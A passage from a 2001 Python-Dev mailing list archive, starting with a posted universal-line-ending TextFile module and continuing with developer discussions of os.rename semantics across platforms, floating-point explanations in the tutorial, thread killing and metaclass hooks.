methods I used particularly clean or elegant (or fast) but it's the
first thing I've come up with, and it seems to work.

I've enclosed the module with this email. If that doesn't work, let me
know and I'll put it on a website.

-Chris

-- 
Christopher Barker,
Ph.D.                                                           
ChrisHBarker at home.net                 ---           ---           ---
http://members.home.net/barkerlohmann ---@@       -----@@       -----@@
                                   ------@@@     ------@@@     ------@@@
Oil Spill Modeling                ------   @    ------   @   ------   @
Water Resources Engineering       -------      ---------     --------    
Coastal and Fluvial Hydrodynamics --------------------------------------
------------------------------------------------------------------------
-------------- next part --------------
#!/usr/bin/env python

"""

TextFile.py : a module that provides a UniversalTextFile class, and a
replacement for the native python "open" command that provides an
interface to that class.

It would usually be used as:

from TextFile import open

then you can use the new open just like the old one (with some added flags and arguments)

or

import TextFile

file = TextFile.open(filename,flags,[bufsize], [LineEndingType], [LineBufferSize])


"""
import os

## Re-map the open function
_OrigOpen = open

def open(filename,flags = "",bufsize = -1, LineEndingType = "", LineBufferSize = ""):
    """
    
    A new open function, that returns a regular python file object for
    the old calls, and returns a new nifty universal text file when
    required.

    This works just like the regular open command, except that a new
    flag and a new parameter has been added.

    Call:

    file = open(filename,flags = "",bufsize = -1, LineEndingType = ""):
    - filename is the name of the file to be opened
    - flags is a string of one letter flags, the same as the standard open
      command, plus a "t" for universal text file.
    - - "b" means binary file, this returns the standard binary file object
    - - "t" means universal text file
    - - "r" for read only
    - - "w" for write. If there is both "w" and "t" than the user can
        specify a line ending type to be used with the LineEndingType
        parameter.
    - - "a" means append to existing file

    - bufsize specifies the buffer size to be used by the system. Same
      as the regular open function

    - LineEndingType is used only for writing (and appending) files, to specify a
      non-native line ending to be written.
    - - The options are: "native", "DOS", "Posix", "Unix", "Mac", or the
        characters themselves( "\r\n", etc. ). "native" will result in
        using the standard file object, which uses whatever is native
        for the system that python is running on.

    - LineBufferSize is the size of the buffer used to read data in
    a readline() operation. The default is currently set to 200
    characters. If you will be reading files with many lines over 200
    characters long, you should set this number to the largest expected
    line length.

    
    """

    if "t" in flags: # this is a universal text file
        if ("w" in flags or "a" in flags) and LineEndingType == "native":
            return _OrigOpen(filename,flags.replace("t",""), bufsize)
        return UniversalTextFile(filename,flags,LineEndingType,LineBufferSize)
    else: # this is a regular old file
        return _OrigOpen(filename,flags,bufsize)
    
    
class UniversalTextFile:
    """
    
    A class that acts just like a python file object, but has a mode
    that allows the reading of arbitrary formated text files, i.e. with
    either Unix, DOS or Mac line endings. [\n , \r\n, or \r]

    To keep it truly universal, it checks for each of these line ending
    possibilities at every line, so it should work on a file with mixed
    endings as well.

    """
    def __init__(self,filename,flags = "",LineEndingType = "native",LineBufferSize = ""):
        self._file = _OrigOpen(filename,flags.replace("t","")+"b")

        LineEndingType = LineEndingType.lower()
        if LineEndingType == "native":
            self.LineSep = os.linesep()
        elif LineEndingType == "dos":
            self.LineSep = "\r\n"
        elif LineEndingType == "posix" or LineEndingType == "unix" :
            self.LineSep = "\n"
        elif LineEndingType == "mac":
            self.LineSep = "\r"
        else:
            self.LineSep = LineEndingType
        
        ## some attributes
        self.closed = 0
        self.mode = flags
        self.softspace = 0
        if LineBufferSize:
            self._BufferSize = LineBufferSize
        else:
            self._BufferSize = 100

    def readline(self):
        start_pos = self._file.tell()
        ##print "Current file posistion is:", start_pos
        line = ""
        TotalBytes = 0
        Buffer = self._file.read(self._BufferSize)
        while Buffer:
            ##print "Buffer = ",repr(Buffer)
            newline_pos = Buffer.find("\n")
            return_pos  = Buffer.find("\r")
            if return_pos == newline_pos-1 and return_pos >= 0: # we have a DOS line
                line = Buffer[:return_pos]+ "\n"
                TotalBytes = newline_pos+1
                break
            elif ((return_pos < newline_pos) or newline_pos < 0 ) and return_pos >=0: # we have a Mac line
                line = Buffer[:return_pos]+ "\n"
                TotalBytes = return_pos+1
                break
            elif newline_pos >= 0: # we have a Posix line
                line = Buffer[:newline_pos]+ "\n"
                TotalBytes = newline_pos+1
                break
            else: # we need a larger buffer
                NewBuffer = self._file.read(self._BufferSize)
                if NewBuffer:
                    Buffer = Buffer + NewBuffer
                else: # we are at the end of the file, without a line ending.
                    self._file.seek(start_pos + len(Buffer))
                    return Buffer

        self._file.seek(start_pos + TotalBytes)
        return line

    def readlines(self,sizehint = None):
        """

        readlines acts like the regular readlines, except that it
        understands any of the standard text file line endings ("\r\n",
        "\n", "\r").

        If sizehint is used, it will read a a mximum of that many
        bytes. It will not round up, as the regular readline does. This
        means that if your buffer size is less thatn the length of the
        next line, you won't get anything.

        """
        
        if sizehint:
            Data = self._file.read(sizehint)
        else:
            Data = self._file.read()

        if len(Data) == sizehint:
            #print "The buffer is full"
            FullBuffer = 1
        else:
            FullBuffer = 0
        Data = Data.replace("\r\n","\n").replace("\r","\n")
        Lines = [line + "\n" for line in Data.split('\n')]
        #print Lines
        ## If the last line is only a linefeed it is an extra line
        if Lines[-1] == "\n":
            del Lines[-1]
        ## if it isn't then the last line didn't have a linefeed, so we need to remove the one we put on.
        else:
            ## or it's the end of the buffer
            if FullBuffer:
                #print "the file is at:",self._file.tell()
                #print "the last line has length:",len(Lines[-1])
                self._file.seek(-(len(Lines[-1])-1),1) # reset the file position
                del(Lines[-1])
            else:
                Lines[-1] = Lines[-1][:-1]
        return Lines

    def readnumlines(self,NumLines = 1):
        """

        readnumlines is an extension to the standard file object. It
        returns a list containing the number of lines that are
        requested. I have found this to be very usefull, and allows me to avoid the many loops like:

        lines = []
        for i in range(N):
            lines.append(file.readline())

        Also, If I ever get around to writing this in C, it will provide a speed improvement.

        """
        Lines = []
        while len(Lines) < NumLines:
            Lines.append(self.readline())
        return Lines

    def read(self,size = None):
        """
     
        read acts like the regular read, except that it tranlates any of
        the standard text file line endings ("\r\n", "\n", "\r") into a
        "\n"
        
        If size is used, it will read a maximum of that many bytes,
        before translation. This means that if the line endings have
        more than one character, the size returned will be smaller. This
        could gbe patched, but it didn't seem worth it. If you want that
        much control, use a binary file.
      
        """
        
        if size:
            Data = self._file.read(size)
        else:
            Data = self._file.read()
            
        return Data.replace("\r\n","\n").replace("\r","\n")
    
    def write(self,string):
        """

        write is just like the regular one, except that it uses the line
          separator specified when the file was opened for writing or
          appending.


        """
        self._file.write(string.replace("\n",self.LineSep))

    def writelines(self,list):
        for line in list:
            self.write(line)
        

    # The rest of the standard file methods mapped
    def close(self):
        self._file.close()
        self.closed = 1
    def flush(self):
        self._file.flush()
    def fileno(self):
        return self._file.fileno()
    def seek(self,offset,whence = 0):
        self._file.seek(offset,whence)
    def tell(self):
        return self._file.tell()
    

From guido at digicool.com  Wed May 23 01:46:53 2001
From: guido at digicool.com (Guido van Rossum)
Date: Tue, 22 May 2001 19:46:53 -0400
Subject: [Python-Dev] unifying os.rename semantics across platform
In-Reply-To: Your message of "Tue, 22 May 2001 16:54:42 CDT."
             <15114.57378.887742.531145@beluga.mojam.com> 
References: <15114.57378.887742.531145@beluga.mojam.com> 
Message-ID: <200105222346.f4MNkr104833@odiug.digicool.com>

> It was brought to my attention a week ago by a client that os.rename
> semantics differ between Unix and Windows.  On Unix, if the destination file
> already exists it is silently deleted.  On Windows, an exception is raised.
> I was able to verify this for Python 2.0 on Windows98.  I assume nothing
> changed for 2.1, but I can't verify that.

I've always known this, and assumed it was common knowledge.
Sorry. ;-)

> (Windows trashed my partition
> table and my Linux root partition while I was downloading 2.1.
> Consequently, I no longer run Windows.  Take that, Bill...)  I haven't
> checked the Mac yet (will do that when I get back to the US), but I think
> that os.rename should have the same semantics across all platforms.  To the
> extent reasonably possible, I think this should also be true of other common
> functions exposed through the os module.
> 
> On the (unsupportable) theory that to-date, more Python apps have been
> written and/or deployed on Unix-like systems and that where Windows apps are
> concerned, many developers will have added a thin wrapper to mimic the Unix
> semantics, I think less breakage would result if the Unix semantics were
> implemented in the Windows version.  It appears that is what POSIX
> compliance would demand as well.
> 
> Skip

I certainly wouldn't want to try to emulate the Windows semantics on
Unix.  However, I think that emulating the correct Posix semantics on
Windows is not possible either.  The Posix rename() call guarantees
that it is atomic: there is no point in time where the file doesn't
exist at all (and a system or program crash can't delete the file).  I
wouldn't know how to do that in Windows -- the straightforward version

    if os.path.exists(target):
        os.unlink(target)
    os.rename(source, target)

leaves a vulnerability open where the target doesn't exist and if at
that point the system crashes or the program is killed, you lose the
target.

I would prefer to document the difference so applications can decide
how to deal with this.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido at digicool.com  Wed May 23 01:50:29 2001
From: guido at digicool.com (Guido van Rossum)
Date: Tue, 22 May 2001 19:50:29 -0400
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: Your message of "Tue, 22 May 2001 14:44:09 PDT."
             <Pine.LNX.4.21.0105221432100.21762-100000@localhost.localdomain> 
References: <Pine.LNX.4.21.0105221432100.21762-100000@localhost.localdomain> 
Message-ID: <200105222350.f4MNoUj04853@odiug.digicool.com>

> Who was it that said every equation will halve your audience?

Einstein.

> I agree with that, the tutorial should try to be as broad and simple
> as possible.

But keep in mind that the particular Python tutorial we're talking
about is intended for an audience of folks who already know how to
program.  I vote against dumbing this down.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From michel at digicool.com  Wed May 23 02:17:59 2001
From: michel at digicool.com (Michel Pelletier)
Date: Tue, 22 May 2001 17:17:59 -0700 (PDT)
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: <200105222350.f4MNoUj04853@odiug.digicool.com>
Message-ID: <Pine.LNX.4.21.0105221712250.22109-100000@localhost.localdomain>

On Tue, 22 May 2001, Guido van Rossum wrote:

> > I agree with that, the tutorial should try to be as broad and simple
> > as possible.
> 
> But keep in mind that the particular Python tutorial we're talking
> about is intended for an audience of folks who already know how to
> program.  I vote against dumbing this down.

Now that I've actually read the tutorial (wink) I see the true target
audience.  For some reason, I thought it was oriented more toward the CP4E
audience.

Is there a python "children's book" complete with big red dogs and rabbits
in waistcoats?  That would be an interesting project...

-Michel


From guido at digicool.com  Wed May 23 02:20:25 2001
From: guido at digicool.com (Guido van Rossum)
Date: Tue, 22 May 2001 20:20:25 -0400
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: Your message of "Tue, 22 May 2001 17:17:59 PDT."
             <Pine.LNX.4.21.0105221712250.22109-100000@localhost.localdomain> 
References: <Pine.LNX.4.21.0105221712250.22109-100000@localhost.localdomain> 
Message-ID: <200105230020.f4N0KPU05103@odiug.digicool.com>

> Is there a python "children's book" complete with big red dogs and rabbits
> in waistcoats?  That would be an interesting project...

See http://www.python.org/sigs/edu-sig/ and
http://www.python.org/doc/Intros.html (the latter has a section with
intros for non-programmers).

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tim.one at home.com  Wed May 23 02:23:42 2001
From: tim.one at home.com (Tim Peters)
Date: Tue, 22 May 2001 20:23:42 -0400
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: <Pine.LNX.4.21.0105221432100.21762-100000@localhost.localdomain>
Message-ID: <LNBBLJKPBEHFEDALKOLCEEOCKDAA.tim.one@home.com>

I struggled with a way to do a better job of explaining this stuff last
night.  As I see others already said, the Tutorial is not aimed at script
kiddies, or non-programmers, or even programming newbies, but at programmers
who are simply new to Python.  So everything I put in the tutorial was either
jarringly out of place, or inadequate to address the audience you (Michel)
have in mind.  But I agree that's an important audience, and I spend a fair
chunk of my life now anyway eexplaining this stuff over & over to those who
think computing a ratio of two integers is akin to solving fourth order
differential equations <wink>.

In the end I decided to write a Tutorial Appendix in a much gentler style.
It doesn't really fit with the rest of the Tutorial, but then that's *why*
it's an Appendix.  The patch is here:

    http://sourceforge.net/tracker/index.php?func=detail&
        aid=426208&group_id=5470&atid=305470

I also changed the tutorial fp examples so they have an excellent chance of
displaying the same strings across all platforms, and even if Python 10K
defaults to decimal floating-point someday (perhaps in the year 10000, as its
name suggests).


From gward at python.net  Wed May 23 02:33:11 2001
From: gward at python.net (Greg Ward)
Date: Tue, 22 May 2001 20:33:11 -0400
Subject: [Python-Dev] unifying os.rename semantics across platform
In-Reply-To: <200105222346.f4MNkr104833@odiug.digicool.com>; from guido@digicool.com on Tue, May 22, 2001 at 07:46:53PM -0400
References: <15114.57378.887742.531145@beluga.mojam.com> <200105222346.f4MNkr104833@odiug.digicool.com>
Message-ID: <20010522203311.E1245@gerg.ca>

On 22 May 2001, Guido van Rossum said:
> I would prefer to document the difference so applications can decide
> how to deal with this.

I agree -- it has always seemed to me that the standard library merely
exposes the underlying OS functionality for you.  This puts portability
somewhat in the hands of the application writer -- with power comes
responsibility.  I think that's the way it should be; any attempt to
convert OS A to the semantics of OS B will fall down somewhere.  Witness
the loss-of-atomicity in Guido's example.  I'm sure any other semantic
difference between OSes would have similar "gotchas" if we attempted to
paper over them.

        Greg
-- 
Greg Ward - just another Python hacker                  gward at python.net
http://starship.python.net/~gward/
Beware of altruism.  It is based on self-deception, the root of all evil.


From tim.one at home.com  Wed May 23 08:31:29 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 23 May 2001 02:31:29 -0400
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: <20010522094157.A1245@gerg.ca>
Message-ID: <LNBBLJKPBEHFEDALKOLCGEONKDAA.tim.one@home.com>

[Greg Ward, on http://www.lahey.com/float.htm]

> I found this article more useful, interesting, and informative than
> whatever I learned about binary floating-point in my academic years.
> Good link, Tim.  Two catches:
>
>   * I can just barely follow the FORTRAN examples; I very much doubt
>     the average Python newbie would have any more luck than me

The goal is to frighten them:  the ones with the right stuff to use fp
without destroying a satellite, bringing down the Internet, designing a
pacemaker that fails when rounding a corner clockwise at 1.37g, causing a
small country's economy to collapse, making jet fighters spontaneously turn
upside down when crossing the equator, or triggering WW III by accident, will
persist <wink>.  BTW, not all of those were made up!

>   * I tried several of the FORTRAN examples in Python, and did not
>     witness any of the gotchas they are meant to illustrate.  Possibly
>     it's just single-precision vs. double-precision difference, but
>     Python 2.1 under Linux 2.2 on an Athlon compiled with gcc 2.95.2
>     doesn't demonstrate the same gotchas as that article does.

You can't illustrate the last half of their examples in Python without
playing obscure games with the struct module, because they rely on the
existence of more than one size of floating-point type.

Your lack of luck with the first half of their examples is indeed solely due
to that he used single-precision examples and Python's float is double.  You
need to find different numbers to show the same things in Python; like so:

# Binary Floating Point
x = 100000000000. * 0.00000000001
if x != 1.0:
    print "Oops!  It's %r" % x

# Inexactness
a = 98. / 49.
reciprocal = 1./49.
b = 98. * reciprocal
if a != b:
    print "Oops!  They're %r and %r" % (a, b)

# Crazy Conversions
x = 32.05
y = x * 100. # "looks like" 3205. if display rounded
i = int(y)   # actually truncates to 3204
print y, i, repr(y)

It's Real Work coming up with stuff like that.  What I'm hearing is that
people won't understand it anyway -- so screw it.  If they want an education,
they can prove it by doing a google search <0.6 wink>.


From tim.one at home.com  Wed May 23 08:44:14 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 23 May 2001 02:44:14 -0400
Subject: [Python-Dev] unifying os.rename semantics across platform
In-Reply-To: <200105222346.f4MNkr104833@odiug.digicool.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCCEOOKDAA.tim.one@home.com>

[Guido]
> ...
> I certainly wouldn't want to try to emulate the Windows semantics on
> Unix.  However, I think that emulating the correct Posix semantics on
> Windows is not possible either.

Neither is it desirable:  Windows isn't POSIX, and Windows users would be
appalled if os.rename() could silently destroy files.  If such a function
needs to exist, create a new cowboy_unix_tricks module instead <wink>.

This has never been a problem for me because I always check to see whether
the target file exists before using os.rename(), and do something else if it
does.  I understand that's vulnerable to races, but nobody asked whether I
cared about that <wink>.

> The Posix rename() call guarantees that it is atomic: there is no
> point in time where the file doesn't exist at all (and a system or
> program crash can't delete the file).  I wouldn't know how to do
> that in Windows -- the straightforward version
>
>     if os.path.exists(target):
>         os.unlink(target)
>     os.rename(source, target)
>
> leaves a vulnerability open where the target doesn't exist and if at
> that point the system crashes or the program is killed, you lose the
> target.

More obvious, it also fails if target simply exists and is open (you can't
unlink an open file on Windows).

Nevertheless, you can do this renaming safely on Windows, via doing the right
system magic to make rename happen at reboot time before Windows actually
starts.  But I'm not sure Skip's client would want to reboot each time Python
did a file rename <wink>.

> I would prefer to document the difference so applications can decide
> how to deal with this.

Yup!


From MarkH at ActiveState.com  Wed May 23 10:55:17 2001
From: MarkH at ActiveState.com (Mark Hammond)
Date: Wed, 23 May 2001 18:55:17 +1000
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: <LNBBLJKPBEHFEDALKOLCGEONKDAA.tim.one@home.com>
Message-ID: <LCEPIIGDJPKCOIHOBJEPIELMDNAA.MarkH@ActiveState.com>

[Tim on a subject near and dear to his testicles]

> It's Real Work coming up with stuff like that.  What I'm hearing is that
> people won't understand it anyway -- so screw it.  If they want
> an education,
> they can prove it by doing a google search <0.6 wink>.

I am inclined to agree.

IMO, The Python tutorial or other documentation should include a basic
example of these "errors", and a link to _either_ of the HTML pages
referenced in this thread as an optional extra.

Just enough to stop _most_ of the "this is a bug" posts - but stopping well
short of any attempt to "educate" them in floating point madness.  Just
_one_ example of floats not being exact would suffice.

Going from my personal experience, I learnt long ago that floating point is
not exact.  That is all I needed to know to move on.  I didn't like it, and
I didn't understand exactly why (I thought I did, but Tim put a stop to that
misconception <wink>), but I could move on once I had that skerrick of
enlightenment.  And believe it or not, some of my code _does_ use floats,
and _does_ work! (well, works as well as the rest of my code anyway <wink>)

And-it-wasn't-even-Python-that-taught-me,

Mark.


From pf at artcom-gmbh.de  Wed May 23 09:49:13 2001
From: pf at artcom-gmbh.de (Peter Funk)
Date: Wed, 23 May 2001 09:49:13 +0200 (MEST)
Subject: [Python-Dev] unifying os.rename semantics across platform
In-Reply-To: <15114.57947.313813.522806@cj42289-a.reston1.va.home.com> from "Fred
 L. Drake, Jr." at "May 22, 2001 06:04:11 pm"
Message-ID: <m152TOL-000CpwC@artcom0.artcom-gmbh.de>

Hi,

Fred L. Drake, Jr. schrieb:
> skip at pobox.com writes:
>  > On the (unsupportable) theory that to-date, more Python apps have been
>  > written and/or deployed on Unix-like systems and that where Windows apps are
>  > concerned, many developers will have added a thin wrapper to mimic the Unix
>  > semantics, I think less breakage would result if the Unix semantics were
> 
>   I don't know whether there are more deployed Python apps on Unix
> than on Windows (and I've no good idea about how to find out), but I
> think unifying the semantics one way or the other is a good thing.
> Regardless of which set of semantics is chosen.

I agree.  May I suggest to add an optional third boolean parameter to 
os.rename called 'replace', which defaults either to TRUE or FALSE, so 
modifying existing apps  will become even less hassle to potential porters.  
Here is a strawman to explain what I mean:
--------------------------------------
import os

def new_rename(src, dst, replace=0, old_rename=os.rename):
    if os.path.exists(dst):
        if replace:
            if not os.path.isdir(dst):
                os.remove(dst)
            else:
                # I'm not sure what to do here.  recursive removal?  dangerous!
                raise NotImplementedError
        else:
            raise OSError("%s already exists" % dst)
    return old_rename(src, dst)

os.rename = new_rename
--------------------------------------

Regards, Peter
-- 
Peter Funk, Oldenburger Str.86, D-27777 Ganderkesee, Germany, Fax:+49 4222950260
office: +49 421 20419-0 (ArtCom GmbH, Grazer Str.8, D-28359 Bremen, Germany)


From jack at oratrix.nl  Wed May 23 13:15:10 2001
From: jack at oratrix.nl (Jack Jansen)
Date: Wed, 23 May 2001 13:15:10 +0200
Subject: [Python-Dev] Assertion failed in dictobject.c
Message-ID: <20010523111510.D504D3B8999@snelboot.oratrix.nl>

I'm seeing the assert on line 525 in dictobject.c (revision 2.92) failing. The 
debugger tells me that ma_fill and ma_size are both 8. ma_used is 2, and 
interestingly hash is also 8.

Going back to revision 2.90 fixes the problem (or masks it).
--
Jack Jansen             | ++++ stop the execution of Mumia Abu-Jamal ++++
Jack.Jansen at oratrix.com | ++++ if you agree copy these lines to your sig ++++
www.oratrix.nl/~jack    | ++++ see http://www.xs4all.nl/~tank/ ++++


From skip at pobox.com  Wed May 23 13:59:45 2001
From: skip at pobox.com (skip at pobox.com)
Date: Wed, 23 May 2001 06:59:45 -0500
Subject: [Python-Dev] unifying os.rename semantics across platform
In-Reply-To: <LNBBLJKPBEHFEDALKOLCCEOOKDAA.tim.one@home.com>
References: <200105222346.f4MNkr104833@odiug.digicool.com>
	<LNBBLJKPBEHFEDALKOLCCEOOKDAA.tim.one@home.com>
Message-ID: <15115.42545.172775.716565@beluga.mojam.com>

>>>>> "Tim" == Tim Peters <tim.one at home.com> writes:

    Tim> [Guido]
    >> I would prefer to document the difference so applications can decide
    >> how to deal with this.

    Tim> Yup!

Submitted as patch #426598, assigned to Dr. Doc (aka Fred).

Skip


From skip at pobox.com  Wed May 23 14:11:51 2001
From: skip at pobox.com (skip at pobox.com)
Date: Wed, 23 May 2001 07:11:51 -0500
Subject: [Python-Dev] unifying os.rename semantics across platform
In-Reply-To: <m152TOL-000CpwC@artcom0.artcom-gmbh.de>
References: <15114.57947.313813.522806@cj42289-a.reston1.va.home.com>
	<m152TOL-000CpwC@artcom0.artcom-gmbh.de>
Message-ID: <15115.43271.480135.227059@beluga.mojam.com>

    Peter> I agree.  May I suggest to add an optional third boolean
    Peter> parameter to os.rename called 'replace', which defaults either to
    Peter> TRUE or FALSE, so modifying existing apps will become even less
    Peter> hassle to potential porters.

In his response to my post, Guido indicated there is a race condition.
Between the time you delete the preexisting destination file and do the
actual file rename, Windows could wink out on you, leaving you with the
original src file and no original dst file.  POSIX semantics require the
rename to be atomic.  This is just not going to be possible.

Fred, perhaps my doc mod should be enhanced to identify the race condition
for people who need to use os.rename on Windows and will be forced to first
unlink the destination file.

Skip


From guido at digicool.com  Wed May 23 15:19:24 2001
From: guido at digicool.com (Guido van Rossum)
Date: Wed, 23 May 2001 09:19:24 -0400
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: Your message of "Wed, 23 May 2001 02:31:29 EDT."
             <LNBBLJKPBEHFEDALKOLCGEONKDAA.tim.one@home.com> 
References: <LNBBLJKPBEHFEDALKOLCGEONKDAA.tim.one@home.com> 
Message-ID: <200105231319.f4NDJOs06485@odiug.digicool.com>

I liked the text that Tim posted to SF, but I would like it even
better if it also *contained* the text from the "PresentationError"
moinmoin wiki page, rather than referring to it by URL.  The moinmoin
URL is not a good long-term name for that information -- printed
copies of the tutorial will persist long after the moinmoin wiki has
been moved or consolidated.  Plus, instead of referring people to the
moinmoin wiki page, I'd like to be able to refer them to the appendix
of the tutorial!

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido at digicool.com  Wed May 23 15:32:17 2001
From: guido at digicool.com (Guido van Rossum)
Date: Wed, 23 May 2001 09:32:17 -0400
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: Your message of "Wed, 23 May 2001 18:55:17 +1000."
             <LCEPIIGDJPKCOIHOBJEPIELMDNAA.MarkH@ActiveState.com> 
References: <LCEPIIGDJPKCOIHOBJEPIELMDNAA.MarkH@ActiveState.com> 
Message-ID: <200105231332.f4NDWH706564@odiug.digicool.com>

[Mark]
> IMO, The Python tutorial or other documentation should include a basic
> example of these "errors", and a link to _either_ of the HTML pages
> referenced in this thread as an optional extra.
> 
> Just enough to stop _most_ of the "this is a bug" posts - but
> stopping well short of any attempt to "educate" them in floating
> point madness.  Just _one_ example of floats not being exact would
> suffice.

I agree: we don't have to explain *why* it happens.  We just have to
explain *that* it happens, so so folks don't think they've discovered
a bug in Python.

Or maybe we could do this: in the main text, explain and show *that*
it happens, and refer to the appendix which can explain *why* it
happens to those interested, in a gentle manner like what Tim already
wrote.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido at digicool.com  Wed May 23 15:52:02 2001
From: guido at digicool.com (Guido van Rossum)
Date: Wed, 23 May 2001 09:52:02 -0400
Subject: [Python-Dev] unifying os.rename semantics across platform
In-Reply-To: Your message of "Wed, 23 May 2001 09:49:13 +0200."
             <m152TOL-000CpwC@artcom0.artcom-gmbh.de> 
References: <m152TOL-000CpwC@artcom0.artcom-gmbh.de> 
Message-ID: <200105231352.f4NDq3g06738@odiug.digicool.com>

> May I suggest to add an optional third boolean parameter to
> os.rename called 'replace', which defaults either to TRUE or FALSE,
> so modifying existing apps will become even less hassle to potential
> porters.

I see no reason to change the API.

In any case, for backwards compatibility, the default would have to be
platform dependent, which strikes me as just as bad as the current
situation.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From thomas at xs4all.net  Wed May 23 16:00:25 2001
From: thomas at xs4all.net (Thomas Wouters)
Date: Wed, 23 May 2001 16:00:25 +0200
Subject: [Python-Dev] Python 2.1.1
Message-ID: <20010523160025.B690@xs4all.nl>

As those of you on python-checkins might have noticed ;) I started checking
in Python 2.1.1 bufixes. I'd hoped to finish all of my backlog today, but
unfortuantely I'm now called away on a suprise emergency meeting, so I'm not
sure if I'll make it. The 2.1.1 tree is sort of an unstable state right now,
I'll fix that today in any case, but after the meeting.

(As for why I started doing it: I just spent about two weeks of digging
through Pine sourcecode, and its imap server in particular, and I decided I
deserved a break -- Python reads like a Heinlein novel, after pine code:
readable, straight-forward, and just enough complexity to keep it
entertaining :)

-- 
Thomas Wouters <thomas at xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From aahz at rahul.net  Wed May 23 16:08:45 2001
From: aahz at rahul.net (Aahz Maruch)
Date: Wed, 23 May 2001 07:08:45 -0700 (PDT)
Subject: [Python-Dev] Killing threads
Message-ID: <20010523140845.B092299C83@waltz.rahul.net>

Okay, so we all know it isn't possible to kill threads cleanly and
safely in any kind of cross-platform way.  At the same time, a program
that has a thread running haywire should be able to kill itself
completely, so that a monitoring process can restart it.  How hard would
it be to do only that in a cross-platform way?

I'm guessing that for Unix, we'd just send a hard signal (9 or 15).  No
clue what would need to happen for Windows and Mac.

(This got brought up because I experimented with os._exit() as a
possible solution, but that GPFs on Win98SE.)
-- 
                      --- Aahz (@pobox.com)

Hugs and backrubs -- I break Rule 6       <*>       http://www.rahul.net/aahz/
Androgynous poly kinky vanilla queer het Pythonista

I don't really mind a person having the last whine, but I do mind
someone else having the last self-righteous whine.


From thomas.heller at ion-tof.com  Wed May 23 19:28:07 2001
From: thomas.heller at ion-tof.com (Thomas Heller)
Date: Wed, 23 May 2001 19:28:07 +0200
Subject: [Python-Dev] New metaclass pattern (Was Re: Simulating Class (was Re: Does Python have Class methods))
References: <OF92F5AE57.7BB01157-ON88256A50.00672E1C@i2.com>
Message-ID: <020301c0e3ad$bb559790$e000a8c0@thomasnotebook>

[this message has also been posted to comp.lang.python]
Guido's metaclass hook in Python goes this way:

If a base class (let's better call it a 'base object')
has a __class__ attribute, this is called to create the
new class.


From guido at digicool.com  Wed May 23 20:02:06 2001
From: guido at digicool.com (Guido van Rossum)
Date: Wed, 23 May 2001 14:02:06 -0400
Subject: [Python-Dev] New metaclass pattern (Was Re: Simulating Class (was Re: Does Python have Class methods))
In-Reply-To: Your message of "Wed, 23 May 2001 19:28:07 +0200."
             <020301c0e3ad$bb559790$e000a8c0@thomasnotebook> 
References: <OF92F5AE57.7BB01157-ON88256A50.00672E1C@i2.com>  
            <020301c0e3ad$bb559790$e000a8c0@thomasnotebook> 
Message-ID: <200105231802.f4NI26408784@odiug.digicool.com>

> [this message has also been posted to comp.lang.python]
[And I'm cc'ing there]

> Guido's metaclass hook in Python goes this way:
> 
> If a base class (let's better call it a 'base object')
> has a __class__ attribute, this is called to create the
> new class.
> 
> >From demo/metaclasses/index.html:
> 
> class C(B):
>     a = 1
>     b = 2
> 
> Assuming B has a __class__ attribute, this translates into:
> 
> C = B.__class__('C', (B,), {'a': 1, 'b': 2})

Yes.

> Usually B is an instance of a normal class.

No, B should behave like a class, which makes it an instance of a
metaclass.

> So the above code will create an instance of B,
> call B's __init__ method with 'C', (B,), and {'a': 1, 'b': 2},
> and assign the instance of B to the variable C.

No, it will not create an instance of B.  It will create an instance
of B.__class__, which is a subclass of B.  The difference between
subclassing and instantiation is confusing, but crucial, when talking
about metaclasses!  See the ASCII art in my classic post to the
types-sig:
http://mail.python.org/pipermail/types-sig/1998-November/000084.html

> I've ever since played with this metaclass hook, and
> always found the problem that B would have to completely
> simulate the normal python behaviour for classes (modifying
> of course what you want to change).
> 
> The problem is that there are a lot of successful and
> unsucessful attribute lookups, which require a lot
> of overhead when implemented in Python: So the result
> is very slow (too slow to be usable in some cases).

Yes.  You should be able to subclass an existing metaclass!
Fortunately, in the descr-branch code in CVS, this is possible.  I
haven't explored it much yet, but it should be possible to do things
like:

Integer = type(0)
Class = Integer.__class__   # same as type(Integer)

class MyClass(Class):
    ...

MyObject = MyClass("MyObject", (), {})

myInstance = MyObject()

Here MyClass declares a metaclass, and MyObject is a regular class
that uses MyClass for its metaclass.  Then, myInstance is an instance
of MyObject.

See the end of PEP 252 for info on getting the descr-branch code
(http://python.sourceforge.net/peps/pep-0252.html).

> ------
> 
> Python 2.1 allows to attach attributes to function objects,
> so a new metaclass pattern can be implemented.
> 
> The idea is to let B be a function having a __class__ attribute
> (which does _not_ have to be a class, it can again be a function).

Oh, yuck.  I suppose this is fine if you want to experiment with
metaclasses in 2.1, but please consider using the descr-branch code
instead so you can see what 2.2 will be like!

--Guido van Rossum (home page: http://www.python.org/~guido/)


From mal at lemburg.com  Wed May 23 20:40:58 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Wed, 23 May 2001 20:40:58 +0200
Subject: [Python-Dev] Daily Python URL on your Palm
Message-ID: <3B0C043A.D5C9C604@lemburg.com>

Just thought you might want to know that Fredrik's Daily Python
URL can be downloaded onto the Palm as Avantgo Channel.

Here's the URL for adding the channel:
http://avantgo.com/mydevice/autoadd.html?title=Daily%20Python%20URL&url=http%3A%2F%2Fwww.pythonware.com%2Fdaily%2Findex.htm&max=100&depth=1&images=0&links=1&refresh=always&hours=1&dflags=0&hour=0&quarter=00&s=00

PS: Would be nice if Fredrik could provide a "printable" version
of the Daily URL page, since the table layout doesn't work too
well on the small Palm display.

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
